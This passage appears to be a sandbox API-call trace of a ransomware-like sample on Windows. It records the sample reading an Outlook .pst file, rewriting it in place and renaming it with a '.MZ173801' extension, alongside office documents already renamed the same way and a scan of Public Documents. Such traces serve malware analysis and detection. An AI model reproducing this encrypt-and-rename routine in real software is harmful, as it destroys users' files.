lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0122.520] GetCurrentThreadId () returned 0x1358 [0122.520] GetCurrentThreadId () returned 0x1358 [0122.520] GetCurrentThreadId () returned 0x1358 [0122.521] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.521] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0122.521] GetCurrentThreadId () returned 0x1358 [0122.521] GetCurrentThreadId () returned 0x1358 [0122.521] GetCurrentThreadId () returned 0x1358 [0122.521] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst" (normalized: "c:\\users\\fd1hvy\\documents\\outlook files\\kkcie@kdj.kd.pst"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0122.521] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0122.521] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0122.521] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x42400 [0122.521] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0122.521] VirtualAlloc (lpAddress=0x0, dwSize=0x50000, flAllocationType=0x101000, flProtect=0x4) returned 0x7fe60000 [0122.522] ReadFile (in: hFile=0x3d0, lpBuffer=0x7fe60010, nNumberOfBytesToRead=0x42400, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x7fe60010*, lpNumberOfBytesRead=0x19f6e4*=0x42400, lpOverlapped=0x0) returned 1 [0122.587] CloseHandle (hObject=0x3d0) returned 1 [0122.587] VirtualAlloc (lpAddress=0x0, dwSize=0x50000, flAllocationType=0x101000, flProtect=0x4) returned 0x7fe10000 [0122.596] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst" (normalized: "c:\\users\\fd1hvy\\documents\\outlook files\\kkcie@kdj.kd.pst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0122.599] WriteFile (in: hFile=0x3d0, lpBuffer=0x7fe10010*, nNumberOfBytesToWrite=0x42400, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x7fe10010*, lpNumberOfBytesWritten=0x19f6f0*=0x42400, lpOverlapped=0x0) returned 1 [0122.607] CloseHandle (hObject=0x3d0) returned 1 [0122.607] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst" (normalized: "c:\\users\\fd1hvy\\documents\\outlook files\\kkcie@kdj.kd.pst"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst.MZ173801" (normalized: "c:\\users\\fd1hvy\\documents\\outlook files\\kkcie@kdj.kd.pst.mz173801")) returned 1 [0122.607] VirtualFree (lpAddress=0x7fe60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.609] VirtualFree (lpAddress=0x7fe10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.610] GetCurrentThreadId () returned 0x1358 [0122.610] GetCurrentThreadId () returned 0x1358 [0122.610] GetCurrentThreadId () returned 0x1358 [0122.610] GetCurrentThreadId () returned 0x1358 [0122.610] GetCurrentThreadId () returned 0x1358 [0122.610] GetCurrentThreadId () returned 0x1358 [0122.610] FindNextFileW (in: hFindFile=0xa1bd58, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa736477a, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xa736477a, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0x67d00605, ftLastWriteTime.dwHighDateTime=0x1d5e877, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="kkcie@kdj.kd.pst", cAlternateFileName="KKCIE@~1.PST")) returned 0 [0122.610] GetLastError () returned 0x12 [0122.610] FindClose (in: hFindFile=0xa1bd58 | out: hFindFile=0xa1bd58) returned 1 [0122.611] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\*.*", lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa73182d0, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xaa5ac25c, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xaa5ac25c, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName=".", cAlternateFileName="")) returned 0xa1bce8 [0122.611] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f794 | out: lpLocalFileTime=0x19f794) returned 1 [0122.611] FileTimeToDosDateTime (in: lpFileTime=0x19f794, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0122.611] FindNextFileW (in: hFindFile=0xa1bce8, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa73182d0, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xaa5ac25c, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xaa5ac25c, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="..", cAlternateFileName="")) returned 1 [0122.611] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0122.611] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0122.611] FindNextFileW (in: hFindFile=0xa1bce8, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa736477a, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xa736477a, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0xaa5ac25c, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="kkcie@kdj.kd.pst.MZ173801", cAlternateFileName="KKCIE@~1.MZ1")) returned 1 [0122.611] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0122.611] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0122.611] FindNextFileW (in: hFindFile=0xa1bce8, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa736477a, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xa736477a, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0xaa5ac25c, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="kkcie@kdj.kd.pst.MZ173801", cAlternateFileName="KKCIE@~1.MZ1")) returned 0 [0122.611] GetLastError () returned 0x12 [0122.611] FindClose (in: hFindFile=0xa1bce8 | out: hFindFile=0xa1bce8) returned 1 [0122.611] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba171700, ftCreationTime.dwHighDateTime=0x1d5c11f, ftLastAccessTime.dwLowDateTime=0xb1876b10, ftLastAccessTime.dwHighDateTime=0x1d59dae, ftLastWriteTime.dwLowDateTime=0xa9e12853, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x42ad, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oY9NI6W.xlsx.MZ173801", cAlternateFileName="OY9NI6~1.MZ1")) returned 1 [0122.611] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0122.611] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0122.611] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x766b0710, ftCreationTime.dwHighDateTime=0x1d5ab1b, ftLastAccessTime.dwLowDateTime=0x1bc4c720, ftLastAccessTime.dwHighDateTime=0x1d56ff1, ftLastWriteTime.dwLowDateTime=0xa9e38af7, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x423b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="s89GGesFpGwDjBj.docx.MZ173801", cAlternateFileName="S89GGE~1.MZ1")) returned 1 [0122.611] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0122.611] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0122.611] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff8f8b70, ftCreationTime.dwHighDateTime=0x1d58964, ftLastAccessTime.dwLowDateTime=0x7d1a4530, ftLastAccessTime.dwHighDateTime=0x1d59cf2, ftLastWriteTime.dwLowDateTime=0xa9e38af7, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0xa906, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ScaMQESaGJDS.docx.MZ173801", cAlternateFileName="SCAMQE~1.MZ1")) returned 1 [0122.611] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0122.611] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0122.611] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ed1b2e0, ftCreationTime.dwHighDateTime=0x1d59bb1, ftLastAccessTime.dwLowDateTime=0x1a06f0a0, ftLastAccessTime.dwHighDateTime=0x1d57ccd, ftLastWriteTime.dwLowDateTime=0xa9ed1402, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x10ecd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vTIt-8amnULMnTybMLk.pptx.MZ173801", cAlternateFileName="VTIT-8~1.MZ1")) returned 1 [0122.611] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0122.611] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0122.611] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfad77410, ftCreationTime.dwHighDateTime=0x1d595b9, ftLastAccessTime.dwLowDateTime=0x49c140f0, ftLastAccessTime.dwHighDateTime=0x1d57bd5, ftLastWriteTime.dwLowDateTime=0xa9ef769e, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x6eab, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vyqzJRG.pptx.MZ173801", cAlternateFileName="VYQZJR~1.MZ1")) returned 1 [0122.611] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0122.611] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0122.611] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7ab4b60, ftCreationTime.dwHighDateTime=0x1d5dda0, ftLastAccessTime.dwLowDateTime=0xc69ee1a0, ftLastAccessTime.dwHighDateTime=0x1d5ef24, ftLastWriteTime.dwLowDateTime=0xa9ef769e, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x533b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zypeBTOwi7wsX-d.xlsx.MZ173801", cAlternateFileName="ZYPEBT~1.MZ1")) returned 1 [0122.612] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0122.612] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0122.612] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7ab4b60, ftCreationTime.dwHighDateTime=0x1d5dda0, ftLastAccessTime.dwLowDateTime=0xc69ee1a0, ftLastAccessTime.dwHighDateTime=0x1d5ef24, ftLastWriteTime.dwLowDateTime=0xa9ef769e, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x533b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zypeBTOwi7wsX-d.xlsx.MZ173801", cAlternateFileName="ZYPEBT~1.MZ1")) returned 0 [0122.612] GetLastError () returned 0x12 [0122.612] FindClose (in: hFindFile=0xa1b738 | out: hFindFile=0xa1b738) returned 1 [0122.612] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19fb48, csidl=46, fCreate=0 | out: pszPath="C:\\Users\\Public\\Documents") returned 1 [0122.613] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Documents" (normalized: "c:\\users\\public\\documents")) returned 0x11 [0122.613] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19fb48, csidl=46, fCreate=0 | out: pszPath="C:\\Users\\Public\\Documents") returned 1 [0122.613] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\*.*", lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb1fb672c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb1fb672c, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xa1b738 [0122.650] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb1fb672c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb1fb672c, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0122.650] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fb62ca, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fb62ca, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x116, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0122.650] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa60 | out: lpLocalFileTime=0x19fa60) returned 1 [0122.650] FileTimeToDosDateTime (in: lpFileTime=0x19fa60, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0122.650] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0122.650] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0122.650] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0122.650] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, 